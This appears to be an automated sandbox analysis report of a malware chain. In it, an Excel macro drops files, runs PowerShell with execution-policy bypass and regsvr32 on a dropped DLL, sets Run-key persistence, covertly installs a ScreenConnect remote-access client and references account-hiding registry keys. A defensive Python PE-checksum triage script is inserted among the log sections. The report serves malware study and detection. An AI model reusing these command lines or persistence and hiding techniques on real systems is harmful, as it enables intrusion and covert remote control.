                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Document.exe, 00000025.00000002.4248031265.000000000406D000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000029.00000003.4243485948.0000000004B30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: Document.exe, 00000025.00000002.4248031265.000000000406D000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmp
                            Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp
                            Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000B51000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.0000000005946000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000002.4248031265.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4327567013.0000000007794000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4248031265.000000000432C000.00000004.00000800.00020000.00000000.sdmp, 3dc3b4.msi.39.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6326836605.0000000002C92000.00000002.00000001.01000000.0000001B.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6326836605.0000000002C92000.00000002.00000001.01000000.0000001B.sdmp
                            Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Document.exe, 00000025.00000000.4208691924.000000000074D000.00000002.00000001.01000000.00000011.sdmp

                            Data Obfuscation

                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, ClientSocket.cs | .Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, ClientSocket.cs | .Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, ClientSocket.cs | .Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: 37.2.Document.exe.2e90000.0.raw.unpack, Program.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
                            Source: Document25.xlsm | Stream path 'VBA/Module2': High number of string operations
                            Source: VBA code instrumentation | OLE, VBA macro, High number of string operations: Module Module2 | Name: Module2
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FF727F8A540 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,8_2_00007FF727F8A540
                            Source: Document.exe.12.dr | Static PE information: real checksum: 0x54d1c1 should be: 0x56b655
                            Source: libcares-2.dll.8.dr | Static PE information: real checksum: 0x0 should be: 0x65f7e2
                            Source: msvcp290.dll.5.dr | Static PE information: real checksum: 0x0 should be: 0x3a6aa7
                            Source: msvcp290.dll.8.dr | Static PE information: real checksum: 0x0 should be: 0x3a6aa7
                            Source: libcares-2.dll.5.dr | Static PE information: real checksum: 0x0 should be: 0x65f7e2
                            Source: libcares-2.dll.5.dr | Static PE information: section name: _RDATA
                            Source: msvcp290.dll.5.dr | Static PE information: section name: .managed
                            Source: msvcp290.dll.5.dr | Static PE information: section name: _RDATA
                            Source: newpoveno.exe.5.dr | Static PE information: section name: .xdata
                            Source: libcares-2.dll.8.dr | Static PE information: section name: _RDATA
                            Source: msvcp290.dll.8.dr | Static PE information: section name: .managed
                            Source: msvcp290.dll.8.dr | Static PE information: section name: _RDATA
                            Source: newpoveno.exe.8.dr | Static PE information: section name: .xdata
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF9C021D2A5 pushad ; iretd 10_2_00007FF9C021D2A6
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 24_2_01811270 push edi; ret 24_2_01811282
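The "Static PE information" lines above are worth reproducing by hand when triaging dropped files. In the report's wording, "real checksum" is the value stored in the optional header's CheckSum field and "should be" is the value recomputed over the file: 0x0 means the linker never filled the field (the default for most user-mode binaries, so on its own a weak signal), while a set-but-wrong value such as Document.exe's 0x54d1c1 vs 0x56b655 means the bytes changed after linking (patching, an appended payload, or a packer that did not fix the header up). The section-name hits need the same caution: _RDATA is emitted by current MSVC and .xdata holds x64 unwind data in MinGW output, so only names outside the usual linker set deserve attention. The script below is an added example written for this page, not Joe Sandbox, ConnectWise or sample code; it recomputes the checksum with the CheckSumMappedFile algorithm, compares it to the header, and lists unusual section names. The PE image it builds is constructed (valid headers, no code) so the script runs offline; on a real file call `triage(open(path, "rb").read())`.

```python
"""PE triage: recompute the header CheckSum and list non-standard section names.
Added example for this report, not Joe Sandbox or sample code. The test image is
constructed (headers only) so the script runs offline."""
import struct

# Section names the usual Microsoft and GNU toolchains emit. _RDATA (MSVC) and
# .xdata (MinGW x64 unwind data) are normal, so anything outside this set is a
# prompt to look, not a verdict on its own.
KNOWN_SECTIONS = {
    ".text", ".rdata", ".data", ".idata", ".edata", ".pdata", ".rsrc",
    ".reloc", ".bss", ".tls", ".CRT", ".didat", ".xdata", "_RDATA",
}


def _pe_offset(data: bytes) -> int:
    """Offset of the 'PE\\0\\0' signature, read from e_lfanew in the DOS header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    return struct.unpack_from("<I", data, 0x3C)[0]


def stored_checksum(data: bytes) -> int:
    """CheckSum lives at signature(4) + COFF header(20) + offset 64 of the optional header."""
    return struct.unpack_from("<I", data, _pe_offset(data) + 88)[0]


def pe_checksum(data: bytes) -> int:
    """Recompute the checksum as CheckSumMappedFile does: sum the file as 32-bit
    words with end-around carry, skipping the CheckSum field itself (assumes the
    4-byte alignment of e_lfanew that linkers produce), fold to 16 bits, then add
    the file length. Trailing bytes are zero-padded to a whole word."""
    csum_off = _pe_offset(data) + 88
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == csum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def section_names(data: bytes) -> list:
    """Names from the section table that follows the optional header."""
    pe = _pe_offset(data)
    count = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    table = pe + 24 + opt_size
    return [data[table + 40 * i: table + 40 * i + 8].rstrip(b"\x00").decode("ascii", "replace")
            for i in range(count)]


def triage(data: bytes) -> dict:
    """Stored vs computed checksum, section names, and human-readable findings."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    findings = []
    if stored == 0:
        findings.append("checksum field is zero (never set by the linker)")
    elif stored != computed:
        findings.append(f"checksum mismatch: header 0x{stored:x}, computed 0x{computed:x}")
    odd = [n for n in section_names(data) if n not in KNOWN_SECTIONS]
    if odd:
        findings.append("non-standard section names: " + ", ".join(odd))
    return {"stored": stored, "computed": computed,
            "sections": section_names(data), "findings": findings}


def build_sample_pe(checksum: int, sections=(".text", ".rdata")) -> bytes:
    """Constructed header-only PE32 image for offline testing (not a runnable EXE)."""
    pe_off = 0x80
    dos = bytearray(pe_off)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, pe_off)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)   # CheckSum field
    table = b"".join(n.encode().ljust(8, b"\x00") + bytes(32) for n in sections)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + table


if __name__ == "__main__":
    unset = build_sample_pe(0)                         # like msvcp290.dll: 0x0 in header
    fixed = build_sample_pe(pe_checksum(unset))        # header written back correctly
    patched = build_sample_pe(pe_checksum(unset) + 1)  # like Document.exe: set but wrong
    for name, img in ("unset", unset), ("fixed", fixed), ("patched", patched):
        print(name, triage(img)["findings"])
```

Because the CheckSum field is excluded from the sum, the computed value is the same whether the header holds 0x0 or the right value; that is what lets the loader verify the field without special-casing it, and what makes a stored-but-wrong value an unambiguous sign of post-link modification.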

                            Persistence and Installation Behavior

                            Source: c:\program files (x86)\screenconnect client (ea32d473b92f819d)\screenconnect.windowscredentialprovider.dll | COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-9c4f-a6d669f2633d}\inprocserver32
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | File created: C:\Users\user\SystemRootDoc\msvcp290.dll
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | File created: C:\Users\user\SystemRootDoc\libcares-2.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\Temp\Document.exe
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Core.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.Compression.dll
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIC5F8.tmp
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsFileManager.exe
                            Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.InstallerActions.dll
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsAuthenticationPackage.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.Compression.Cab.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dll
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsBackstageShell.exe
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsCredentialProvider.dll
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICABB.tmp
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe
                            Source: C:\Program Files\7-Zip\7z.exe | File created: C:\Users\user\AppData\Local\Temp\invoice_temp\libcares-2.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Windows.dll
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.dll
                            Source: C:\Program Files\7-Zip\7z.exe | File created: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | File created: C:\Users\user\SystemRootDoc\newpoveno.exe
                            Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp
                            Source: C:\Program Files\7-Zip\7z.exe | File created: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Windows.dll
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICABB.tmp
                            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIC5F8.tmp

                            Boot Survival

                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: newpoveno.exe PID: 5140, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: newpoveno.exe PID: 7468, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: newpoveno.exe PID: 7724, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED
                            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7548, type: MEMORYSTR
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ea32d473b92f819d)
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newpoveno

                            Hooking and other Techniques for Hiding and Protection

                            Source: Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: rundll32.exe, 00000029.00000003.4239690523.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: ScreenConnect.ClientService.exe, 0000002D.00000002.6333087252.0000000001E72000.00000002.00000001.01000000.00000018.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6329378162.0000000002E41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6327680600.0000000002CD0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\58CF1D3677C703D52430 BEA19E2DECE602CED1D3DF8C825A993F3D412C2A4D4D87EAA39F44BA4FB39E82
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
